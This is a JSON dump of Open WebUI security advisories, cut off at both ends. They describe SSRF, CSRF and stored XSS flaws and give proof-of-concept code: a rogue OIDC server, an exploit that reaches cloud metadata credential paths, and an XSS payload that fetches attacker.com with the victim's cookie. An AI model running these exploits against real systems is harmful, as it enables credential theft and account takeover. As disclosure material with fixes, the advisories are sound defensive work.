base64_encoded_picture = base64.b64encode(picture).decode('utf-8')\n                return f'data:{guessed_mime_type};base64,{base64_encoded_picture}'\n```\n\nThe codebase already uses `validate_url()` for the same SSRF protection pattern in other paths:\n- `backend/open_webui/utils/files.py:38` - `validate_url(url)` before `requests.get(url)`\n- `backend/open_webui/routers/images.py:800` - `validate_url(data)` before `requests.get(data)`\n\nThe omission in `_process_picture_url()` is inconsistent with the project's own security practices.\n\n## Affected Code Paths\n\n1. **New user OAuth signup** (line ~1556): `picture_url = await self._process_picture_url(picture_url, token.get('access_token'))`\n2. **Existing user picture update on login** (line ~1536): when `OAUTH_UPDATE_PICTURE_ON_LOGIN=true`\n\n## Steps to Reproduce\n\n### Prerequisites\n- Open WebUI instance with generic OIDC OAuth configured\n- `ENABLE_OAUTH_SIGNUP=true`\n\n### Setup\n\n**1. Start a minimal OIDC server** that returns a malicious `picture` claim pointing to an internal canary endpoint:\n```python\n\"\"\"Minimal OIDC PoC server - save as poc_oidc.py\"\"\"\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport json, urllib.parse\n\nSSRF_TARGET = \"http://host.docker.internal:9000/canary\"\nCANARY = \"SSRF_CONFIRMED_OPEN_WEBUI\"\n\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        path = urllib.parse.urlparse(self.path).path\n        query = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)\n        if path == \"/.well-known/openid-configuration\":\n            self._json({\"issuer\":\"http://host.docker.internal:9000\",\n                \"authorization_endpoint\":\"http://localhost:9000/authorize\",\n                \"token_endpoint\":\"http://host.docker.internal:9000/token\",\n                \"userinfo_endpoint\":\"http://host.docker.internal:9000/userinfo\",\n                \"jwks_uri\":\"http://host.docker.internal:9000/jwks\",\n                \"response_types_supported\":[\"code\"],\"subject_types_supported\":[\"public\"],\n                \"id_token_signing_alg_values_supported\":[\"RS256\"],\n                \"token_endpoint_auth_methods_supported\":[\"client_secret_post\",\"client_secret_basic\"]})\n        elif path == \"/authorize\":\n            ru = query.get(\"redirect_uri\",[\"\"])[0]\n            st = query.get(\"state\",[\"\"])[0]\n            self.send_response(302)\n            self.send_header(\"Location\", f\"{ru}?code=poc-code\u0026state={st}\")\n            self.end_headers()\n        elif path == \"/userinfo\":\n            self._json({\"sub\":\"attacker\",\"email\":\"attacker@example.com\",\"name\":\"Attacker\",\"picture\":SSRF_TARGET})\n        elif path == \"/jwks\":\n            self._json({\"keys\":[]})\n        elif path == \"/canary\":\n            self.send_response(200)\n            self.send_header(\"Content-Type\",\"text/plain\")\n            body = CANARY.encode()\n            self.send_header(\"Content-Length\",len(body))\n            self.end_headers()\n            self.wfile.write(body)\n            print(f\"!!! CANARY FETCHED - SSRF CONFIRMED !!!\")\n        else:\n            self.send_response(404); self.end_headers()\n    def do_POST(self):\n        if \"/token\" in self.path:\n            self._json({\"access_token\":\"tok\",\"token_type\":\"bearer\",\"expires_in\":3600,\n                \"userinfo\":{\"sub\":\"attacker\",\"email\":\"attacker@example.com\",\"name\":\"Attacker\",\"picture\":SSRF_TARGET}})\n    def _json(self, d):\n        b = json.dumps(d).encode()\n        self.send_response(200)\n        self.send_header(\"Content-Type\",\"application/json\")\n        self.send_header(\"Content-Length\",len(b))\n        self.end_headers()\n        self.wfile.write(b)\n\nHTTPServer((\"0.0.0.0\", 9000), Handler).serve_forever()\n```\n\n**2. Run the PoC server:**\n```bash\npython3 poc_oidc.py\n```\n\n**3. Start Open WebUI with Docker:**\n```bash\ndocker run -d -p 3000:8080 \\\n  --name owui-ssrf-test \\\n  --add-host=host.docker.internal:host-gateway \\\n  -e ENABLE_OAUTH_SIGNUP=true \\\n  -e WEBUI_AUTH=true \\\n  -e OAUTH_CLIENT_ID=test-client \\\n  -e OAUTH_CLIENT_SECRET=test-secret \\\n  -e OPENID_PROVIDER_URL=http://host.docker.internal:9000/.well-known/openid-configuration \\\n  -e OAUTH_PROVIDER_NAME=TestOIDC \\\n  -e \"OAUTH_SCOPES=openid email profile\" \\\n  ghcr.io/open-webui/open-webui:main\n```\n\n**4. Create an admin account** at `http://localhost:3000`, then sign out.\n\n**5. Click \"Continue with TestOIDC\"** on the login page.\n\n**6. Observe the PoC server terminal** - it prints `!!! CANARY FETCHED - SSRF CONFIRMED !!!`\n\n**7. Verify exfiltrated data is stored and readable:**\n```bash\ncurl -s http://localhost:3000/api/v1/auths/ \\\n  -H \"Authorization: Bearer \u003csession-token\u003e\" | python3 -c \"\nimport sys, json, base64\ndata = json.load(sys.stdin)\nurl = data.get('profile_image_url', '')\nif 'base64,' in url:\n    decoded = base64.b64decode(url.split('base64,',1)[1]).decode()\n    print(f'DECODED: {decoded}')\n\"\n```\n\n**Result:** `DECODED: SSRF_CONFIRMED_OPEN_WEBUI`\n\nThe server fetched the attacker-controlled URL, base64-encoded the response, stored it as `profile_image_url`, and the attacker can read it back via the API.\n\n## Impact\n\nAn attacker can force the Open WebUI server to make HTTP requests to:\n\n- **Cloud metadata endpoints** (AWS IMDSv1 at `http://169.254.169.254/latest/meta-data/iam/security-credentials/`) to steal IAM credentials\n- **Internal network services** not exposed to the internet\n- **Localhost-bound services** (Redis, Elasticsearch, internal APIs)\n\nThis is a **full-read SSRF**: the complete HTTP response body is exfiltrated to the attacker via the base64-encoded `profile_image_url` field.\n\n## Configuration Note\n\nThis vulnerability requires `ENABLE_OAUTH_SIGNUP=true` (for the new-user path) or `OAUTH_UPDATE_PICTURE_ON_LOGIN=true` (for the existing-user path). While these are not default settings, they are standard in production deployments that use OAuth for user management, which is the primary use case for configuring OAuth at all.\n\n## Suggested Fix\n\nApply `validate_url()` before fetching, consistent with existing patterns in the codebase:\n```python\nfrom open_webui.retrieval.web.utils import validate_url\n\nasync def _process_picture_url(self, picture_url: str, access_token: str = None) -\u003e str:\n    if not picture_url:\n        return '/user.png'\n    try:\n        validate_url(picture_url)  # Add this line\n        # ... rest unchanged\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:19:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh","https://github.com/open-webui/open-webui/releases/tag/v0.9.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45338","https://github.com/advisories/GHSA-24c9-2m8q-qhmh"],"source_kind":"github","identifiers":["GHSA-24c9-2m8q-qhmh","CVE-2026-45338"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.748Z","epss_percentage":0.00396,"epss_percentile":0.32517,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNGM5LTJtOHEtcWhtaM4ABW4y","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yNGM5LTJtOHEtcWhtaM4ABW4y","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNGM5LTJtOHEtcWhtaM4ABW4y/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00djdyLWY0dzgtODk3Ms4ABW4w","url":"https://github.com/advisories/GHSA-4v7r-f4w8-8972","title":"Open WebUI has a full SSRF Vulnerability in the RAG Web Search Feature","description":"# SSRF Bypass via IPv6/IPv4-mapped IPv6/IPv4-reserved-ranges in `validate_url()`\n\n## Summary\n\n`validate_url()` in `backend/open_webui/retrieval/web/utils.py` calls `validators.ipv6(ip, private=True)`, but the `validators` library does NOT implement the `private` keyword for IPv6 — the call raises a `ValidationError` (which is falsy in a boolean context), so every IPv6 address passes the filter. In addition, IPv4-mapped IPv6 (`::ffff:10.0.0.1`) bypasses the IPv4 check entirely, and several reserved IPv4 ranges (`0.0.0.0/8`, `100.64.0.0/10`, `192.0.0.0/24`, etc.) are not blocked.\n\nThe vulnerability has existed since the `validate_url()` function was introduced and was NOT actually fixed by GHSA-c6xv-rcvw-v685 / CVE-2025-65958 despite that patch's intent. It affects every endpoint that calls `validate_url()`, including `/api/v1/retrieval/process/web`, `/api/v1/images/edit`, and others.\n\n## Affected code\n\n`backend/open_webui/retrieval/web/utils.py validate_url()`:\n\n```python\nif validators.ipv6(ip, private=True):  # ValidationError is falsy — never raises\n    raise ValueError(...)\n```\n\n## Proof of concept\n\n```python\nimport validators\nprint(validators.ipv6(\"::1\", private=True))\n# ValidationError(func=ipv6, args={'reason': \"ipv6() got an unexpected keyword argument 'private'\", ...})\n```\n\nEnd-to-end exploit:\n\n```python\nimport requests, ipaddress\n\nOPEN_WEBUI_URL = \"https://target\"\nTOKEN = \"...\"\nTARGET_IPV4 = \"169.254.169.254\"   # AWS IMDSv1\nmapped = \"::ffff:\" + TARGET_IPV4\n\nrequests.post(f\"{OPEN_WEBUI_URL}/api/v1/retrieval/process/web\",\n              headers={\"Authorization\": f\"Bearer {TOKEN}\"},\n              json={\"collection_name\": \"\", \"url\": f\"http://[{mapped}]/latest/meta-data/iam/security-credentials/\"})\n```\n\n## Impact\n\nAny authenticated user can reach any internal IPv4/IPv6 address from the server process — cloud metadata, localhost-bound APIs, internal services. IMDSv1 reachability leads to IAM credential exfiltration.\n\n## Recommended fix\n\nReplace the `validators` library calls with stdlib `ipaddress`:\n\n```python\nimport ipaddress\naddr = ipaddress.ip_address(ip)\nif addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_multicast or addr.is_reserved or addr.is_unspecified:\n    raise ValueError(...)\n# also unwrap IPv4-mapped IPv6 and re-check:\nif isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:\n    addr_v4 = addr.ipv4_mapped\n    if addr_v4.is_private or addr_v4.is_loopback or ...:\n        raise ValueError(...)\n# plus explicit blocks for IANA reserved ranges (0.0.0.0/8, 100.64.0.0/10, etc. — see body for full list).\n```\n\n## Related but separate advisories\n\n- Redirect-bypass cluster: GHSA-rh5x-h6pp-cjj6\n- DNS rebinding TOCTOU: GHSA-h6x2-583h-x99r\n- urlparse / requests parsing-differential: GHSA-8w7q-q5jp-jvgx\n- Playwright loader redirect: GHSA-jrfp-m64g-pcwv\n- Missing `validate_url()` call in image_generations: GHSA-h7cc-wwjp-5xqh\n\n## Credits\n\n- **Dor Konis (dkonis, GE Vernova)** — first to identify the `validators.ipv6(private=True)` silent-fail and IPv4-mapped IPv6 bypass; GHSA-4v7r-f4w8-8972 (this filing, 2024-09-11; credit explicitly requested in original report).\n- **wlayzz** — first to identify the unblocked IPv4 reserved ranges (0.0.0.0/8, 100.64.0.0/10, 192.0.2.0/24, 198.18.0.0/15, 203.0.113.0/24, etc.); GHSA-pxgj-3gvh-mfjv.\n\nSubsequent filings (GHSA-mggf-94hh-vp4w by vnth4nhnt, GHSA-xhgr-g5q7-jg6p by L1M1T-HACK) re-described the same root cause on the same or different endpoints and were closed as duplicates without advisory credit — fixing `validate_url()` once resolves all of them.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:18:54.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-4v7r-f4w8-8972","https://github.com/advisories/GHSA-c6xv-rcvw-v685","https://github.com/open-webui/open-webui/releases/tag/v0.9.0","https://nvd.nist.gov/vuln/detail/CVE-2026-45331","https://github.com/advisories/GHSA-4v7r-f4w8-8972"],"source_kind":"github","identifiers":["GHSA-4v7r-f4w8-8972","CVE-2026-45331"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.750Z","epss_percentage":0.00286,"epss_percentile":0.20501,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00djdyLWY0dzgtODk3Ms4ABW4w","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00djdyLWY0dzgtODk3Ms4ABW4w","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00djdyLWY0dzgtODk3Ms4ABW4w/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qNnc2LTk4NmotMm0ybc4ABW4v","url":"https://github.com/advisories/GHSA-j6w6-986j-2m2m","title":"Open WebUI Vulnerable to Cross-Site Request Forgery (CSRF) via Image URL Manipulation","description":"## Summary\n\nAn application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions.\n\n\n\nThis can be exploited in various locations, including:\n\n• Profile picture\n\n• Model picture\n\n• Hidden images in shared chats\n\n• Images within shared notes\n\n## Details\n\n### Vulnerable Code:\nThis appears to occur in most locations where images can be uploaded/rendered. Here are found sinks:\n\n**Profile Image in chat**\n\n• Note: rendering profile picture in chat\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16Code\n\n**Profile Picture edit**\n\n• Note: Profile picture rendering in edit\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205\n\n**Profile Image Navbar**\n\n• Note: Profile picture rendering in navbar\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237\n\n**Profile Image UserList**\n\n• Note: rendering images in user list admin panel\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399\n\n**Images in chat**\n\n• Note: rendering images in chat\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35\n\n**Image in chat**\n\n• Note: Image sent in chat\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192\n**Model image in chat**\n\n• Note: Model image rendering in chat\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128\n\n**Model image in chat response**\n\n• Note: Model image rendering in the assistant response\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612\n\n**Model Image Admin settings**\n\n• Note: Model image rendering in the admin settings\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336\n\n**Model Image Workspace**\n\n• Note: Model image rendering in the workspace\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336\n\n**Model Image Edit**\n\n• Note: Model image rendering in the edit modal\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407\n\n**Image in Notes**\n\n• Note: Image rendering in shared note\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140\n\n• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184\n\n**Root Cause**\n\n1. Insecure display of image\n\n• Application is sending a GET request to the unvalidated image url\n\n2. Lack of Input Validation\n\n• Image url is not validated for filetype\n\n\n\n## PoCs\n\n### PoC (profile picture)\n\n**Environment**\n\n• Open-WebUl latest version (v0.6.41)\n\n• Valid user\n\n**Step 1: Create a Malicious Link**\n\n• Set up a server to obtain victim's cookies, ip, referer, user-agent, etc\n\n**Step 2: Profile Image URL**\n\n1. Add user\n\n1. Change the profile image url parameter to the malicious URL (server was used for PoC)\n\n2. Example POST request:\n\n\u003cimg width=\"1245\" height=\"484\" alt=\"image\" src=\"https://github.com/user-attachments/assets/295f0ab0-fe41-4d50-9c38-cb8c51a3bca2\" /\u003e\n\n\n4. Repeat action\n\n    1. Repeat for userSignUp, updateUserProfile, and update\n\n**Step 3: View Image on Victim Admin Account**\n\n1. Log into an admin account\n\n2. Visit the admin panel (/admin/users/overview)\n\n3. Notice the GET request sent to the malicious URL\n\n**Step 4: Verify User Information Is Sent**\n\n1. Confirm user information is sent\n\n\u003cimg width=\"1280\" height=\"677\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cb2f4039-167f-43f4-bd37-ffaf4d476cee\" /\u003e\n\n\n### PoC (chat)\n\n**Environment**\n\n• Open-WebUl latest version (v0.6.41)\n\n• Valid user\n\n**Step 1: Create a Malicious Link**\n\n• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc\n\n**Step 2: Start chat**\n\n1. Start chat\n\n1. Send a message\n\n2. Resend POST request\n\n1. Resend post request to this endpoint /api/v1/chats/[chat_id_here]\n\n2. Add in a file with type set to image and the url set to the malicious link\n\n3. Replace models/ids/malicious_url_here with what is applicable\n\n4. {\"chat\":{\"models\":[\"redacted\"],\"history\":{\"messages\":{\"id_here\":{\"id\":\"id_here\",\"parentId\":\"id_here\",\"childrenIds\":[\"id_here\"],\"role\":\"user\",\"content\":\"\",\"files\":[{\"type\":\"image\",\"url\":\"MALICIOUS_URL_HERE\"}],\"timestamp\":1765978991,\"models\":[\"redacted\"]}}},\"params\":{},\"files\":[]}}\n\n\u003cimg width=\"646\" height=\"593\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1273fe2b-3b3b-45dc-9c52-6811f7b18667\" /\u003e\n\n3. Share chat\n\n    1. Copy link to share the chat\n\n**Step 3: View Image on Victim Account**\n\n1. Log into a valid account\n\n2. Open the shared chat\n\n3. Notice the GET request sent to the malicious URL from the hidden image on the page\n\n\u003cimg width=\"1384\" height=\"500\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd6e220d-e039-4916-9865-5ce9f0939951\" /\u003e\n\n\n**Step 4: Verify User Information Is Sent**\n\n1. Confirm user information is sent\n\n\u003cimg width=\"1480\" height=\"797\" alt=\"image\" src=\"https://github.com/user-attachments/assets/78374c2e-d9c6-476b-944d-1c8230398989\" /\u003e\n\n\n### PoC (notes)\n\n**Environment**\n\n• Open WebUI latest version (v0.6.41)\n\n• Valid user with access to notes\n\n**Step 1: Create a Malicious Link**\n\n• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc\n\n**Step 2: Create Note**\n\n1. Resend POST request to /api/v1/notes/[note_id_here]/update\n\n2. Add in the malicious URL to a file\n\n3. Example parameters\n\n    1.  (replace the ID_HERE with valid ID and MALICIOUS_URL_HERE with the malicious URL):\n\n    2. `{\"title\":\"2025-12-17\",\"data\":{\"files\":[{\"id\":\"ID_HERE\",\"type\":\"image\",\"url\":\"MALICIOUS_URL_HERE\"}]},\"access_control\":{\"read\":{\"group_ids\":[],\"user_ids\":[]},\"write\":{\"group_ids\":[],\"user_ids\":[]}}}`\n\n\u003cimg width=\"892\" height=\"662\" alt=\"image\" src=\"https://github.com/user-attachments/assets/325a9bfa-2fb3-45be-aeec-e5695085d7d0\" /\u003e\n\n4. Refresh page and notice the request being sent to the malicious URL\n\n5. Share note and copy link\n\n**Step 5: View Note on Valid Account**\n\n1. Log into a valid account\n\n2. Open the shared note\n\n3. Notice the GET request sent to the malicious URL from the hidden image on the page\n\n\u003cimg width=\"1597\" height=\"317\" alt=\"image\" src=\"https://github.com/user-attachments/assets/767d865b-04a0-42b9-82fc-122acb9cbf16\" /\u003e\n\n**Step 6: Verify User Information Is Sent**\n\n1. Verify that user information is sent.\n\n\u003cimg width=\"1997\" height=\"860\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b0ecab88-9830-4fb4-ac18-acda9eb44ff7\" /\u003e\n\n### PoC (model)\n\n**Environment**\n\n• Open WebUI latest version (v0.6.41)\n\n• Admin user\n\n**Step 1: Create a Malicious Link**\n\n• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc\n\n**Step 2: Create Model**\n\n1. Navigate to /workspace/models\n\n2. Create or edit a model\n\n3. Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id]\n\n1. Change the profile_image_url to the malicious link\n\n2. Example parameters:\n\n3. `{\"id\":\"model_test\",\"base_model_id\":\"redacted\",\"name\":\"MODEL_TEST\",\"meta\":{\"profile_image_url\":\"MALICIOUS_URL_HERE\",\"description\":null,\"suggestion_prompts\":null,\"tags\":[],\"capabilities\":{\"vision\":true,\"file_upload\":true,\"web_search\":true,\"image_generation\":true,\"code_interpreter\":true,\"citations\":true,\"usage\":false}},\"params\":{},\"access_control\":null}`\n\u003cimg width=\"887\" height=\"618\" alt=\"image\" src=\"https://github.com/user-attachments/assets/749dac39-0b9d-4b7e-815d-fd6f3f7c57bd\" /\u003e\n\n\n**Step 3: View Image on Valid Account**\n\n1. Log into a valid account\n\n2. Create chat with the model\n\n3. Notice a GET request is sent to the malicious url\n\n4. All users starting a chat with that model will be vulnerable to the attack\n\n\u003cimg width=\"1852\" height=\"468\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ff69c0a2-326d-4b99-9d8c-a73d9aa0deff\" /\u003e\n\n\n**Step 4:  View Image on Admin Account**\n\n1. Navigate to /workspace/models\n\n2. Notice GET request sent to malicious url\n\n\u003cimg width=\"1793\" height=\"482\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bda6e687-ccad-4914-a779-281dc67ffcfe\" /\u003e\n\n\n\n\n**Step 5: Verify User Information Is Sent**\n\n1. On the set up server verify that improperly set cookies are sent, IP, user-agent, etc.\n\n\u003cimg width=\"1687\" height=\"910\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c783ad50-6701-4df8-8beb-ba0957baa2d9\" /\u003e\n\n### Other Attack Examples\n\n- Alternative malicious links\n\n- Signout of Open WebUI\n\n    - /api/v1/auths/signout\n\n- Internal network endpoints\n\n- Signout of other applications\n\n- Resource intensive endpoints\n\n- Etc\n\n\n### Recommended Fix\n\n- Store images\n\n   - Instead of sending a GET request to load the image each time, store the image and render on the page\n\n- Validate input\n\n   - Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc)\n\n\n## Impact\n\n### Vulnerability Type\n\n- CWE-352: Cross-Site Request Forgery (CSRF)\n\n- CWE-20: Improper Input Validation\n\n### Affected users\n\n- All authenticated users\n\n\nThe impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:18:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m","https://github.com/open-webui/open-webui/releases/tag/v0.9.3","https://nvd.nist.gov/vuln/detail/CVE-2026-45317","https://github.com/advisories/GHSA-j6w6-986j-2m2m"],"source_kind":"github","identifiers":["GHSA-j6w6-986j-2m2m","CVE-2026-45317"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.482Z","updated_at":"2026-09-03T03:03:10.750Z","epss_percentage":0.00165,"epss_percentile":0.05984,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qNnc2LTk4NmotMm0ybc4ABW4v","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qNnc2LTk4NmotMm0ybc4ABW4v","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.3","vulnerable_version_range":"\u003c= 0.9.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qNnc2LTk4NmotMm0ybc4ABW4v/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oY3dwLTgyZzYtOHd4Y84ABW4u","url":"https://github.com/advisories/GHSA-hcwp-82g6-8wxc","title":"Open WebUI has stored XSS via unsanitized Office/Excel/DOCX file preview rendering ({@html} without DOMPurify)","description":"## Related advisory\n\nThis advisory tracks a regression of the original Excel-preview XSS that was \npublicly disclosed and patched under [GHSA-jwf8-pv5p-vhmc](https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc) \n(patched in v0.8.0). The same root cause — `XLSX.utils.sheet_to_html()` output \nrendered via `{@html excelHtml}` without DOMPurify — was reintroduced sometime \nafter v0.8.0 and is exploitable again as of v0.8.12 and through the version \nrange listed above. This advisory additionally covers the related \n`fileOfficeHtml` sink in `src/lib/components/chat/FileNav.svelte` \n(lines 458 and 1285) which was not part of the jwf8 advisory's scope.\n\n## Summary\n\nOpen WebUI renders user-uploaded Office files (Excel, DOCX) as HTML using Svelte's `{@html}` directive **without DOMPurify sanitization**. While the codebase has DOMPurify available and uses it in 9 out of 23 `{@html}` locations (39%), three file-preview rendering paths bypass it entirely, allowing Stored XSS when a user uploads a malicious document.\n\nThis is a classic **defense propagation failure**: the sanitization primitive exists in the codebase but is not consistently applied to all rendering surfaces.\n\n## Root Cause\n\n**The defense primitive exists**: `DOMPurify.sanitize()` is imported and used in components like `General.svelte`, `MarkdownInlineTokens.svelte`, `Banner.svelte`, and `SVGPanZoom.svelte`.\n\n**But 3 file-preview paths skip it**:\n\n### Occurrence 1: FilePreview.svelte — Office HTML\n\n**File**: `src/lib/components/chat/FileNav/FilePreview.svelte` line 324\n\n```svelte\n{:else if fileOfficeHtml !== null}\n    \u003cdiv class=\"office-preview overflow-auto flex-1 min-h-0\"\u003e\n        {@html fileOfficeHtml}   \u003c!-- NO DOMPurify! --\u003e\n    \u003c/div\u003e\n```\n\n`fileOfficeHtml` is generated from user-uploaded Office files (PPT, DOC, etc.) converted to HTML. The HTML is rendered directly without sanitization.\n\n### Occurrence 2: FileItemModal.svelte — Excel HTML\n\n**File**: `src/lib/components/common/FileItemModal.svelte` line 560\n\n```svelte\n{@html excelHtml}   \u003c!-- NO DOMPurify! --\u003e\n```\n\n`excelHtml` is generated from user-uploaded Excel files converted to HTML tables. No sanitization applied.\n\n### Occurrence 3: FileItemModal.svelte — DOCX HTML\n\n**File**: `src/lib/components/common/FileItemModal.svelte` line 590\n\n```svelte\n{@html docxHtml}   \u003c!-- NO DOMPurify! --\u003e\n```\n\n`docxHtml` is generated from user-uploaded DOCX files converted to HTML. No sanitization applied.\n\n## Contrast with Sanitized Paths\n\nFor comparison, the same codebase correctly sanitizes in other locations:\n\n```svelte\n\u003c!-- MarkdownInlineTokens.svelte:130 — SAFE --\u003e\n{@html DOMPurify.sanitize(token.text, { ADD_ATTR: ['target'] })}\n\n\u003c!-- General.svelte:276 — SAFE --\u003e\n{@html DOMPurify.sanitize($config?.license_metadata?.html)}\n\n\u003c!-- Banner.svelte:103 — SAFE --\u003e\n{@html DOMPurify.sanitize(marked.parse(...))}\n```\n\n## Defense Propagation Gap\n\n| Metric | Value |\n|--------|-------|\n| Total `{@html}` usages | 23 |\n| With DOMPurify | 9 (39%) |\n| **Without DOMPurify** | **14 (61%)** |\n| Confirmed exploitable (file preview) | **3** |\n\nThe remaining 11 unsanitized `{@html}` usages include syntax highlighting (`hljs`), KaTeX math rendering, and `marked.parse()` with `sanitizeResponseContent()` pre-processing — these have varying levels of inherent safety but still represent inconsistent defense application.\n\n## Tested Version\n\n- Open WebUI v0.8.12 (commit `9bd8425`, tag `v0.8.12`)\n\n## Steps to Reproduce\n\n### PoC 1: Malicious Excel File\n\n1. Create a `.xlsx` file with a cell containing:\n   ```\n   \u003cimg src=x onerror=\"alert(document.cookie)\"\u003e\n   ```\n   (Using a library like openpyxl to inject raw HTML into cell values)\n\n2. Upload the file to Open WebUI via the chat file upload\n\n3. When any user previews the file → `excelHtml` renders the injected HTML → **XSS fires**\n\n### PoC 2: Malicious DOCX File\n\n1. Create a `.docx` file with embedded HTML:\n   ```xml\n   \u003cw:r\u003e\u003cw:t\u003e\u003c![CDATA[\u003csvg onload=\"fetch('https://attacker.com/steal?c='+document.cookie)\"\u003e]]\u003e\u003c/w:t\u003e\u003c/w:r\u003e\n   ```\n\n2. Upload to Open WebUI\n\n3. File preview renders `docxHtml` → **XSS fires**\n\n### PoC 3: Verify Rendering Path\n\n```javascript\n// In browser devtools on Open WebUI, after uploading a file:\n// The file preview component renders:\n//   FileItemModal → {@html excelHtml}  // no DOMPurify\n//   FileItemModal → {@html docxHtml}   // no DOMPurify\n//   FilePreview   → {@html fileOfficeHtml}  // no DOMPurify\n\n// Compare with safe path:\n//   NotebookView → {@html DOMPurify.sanitize(toStr(output.data['text/html']))}  // sanitized!\n```\n\n## Impact\n\n- **Stored XSS** — malicious file is stored server-side, XSS fires for every user who previews it\n- **Session hijacking** via `document.cookie` theft\n- **Account takeover** — attacker can 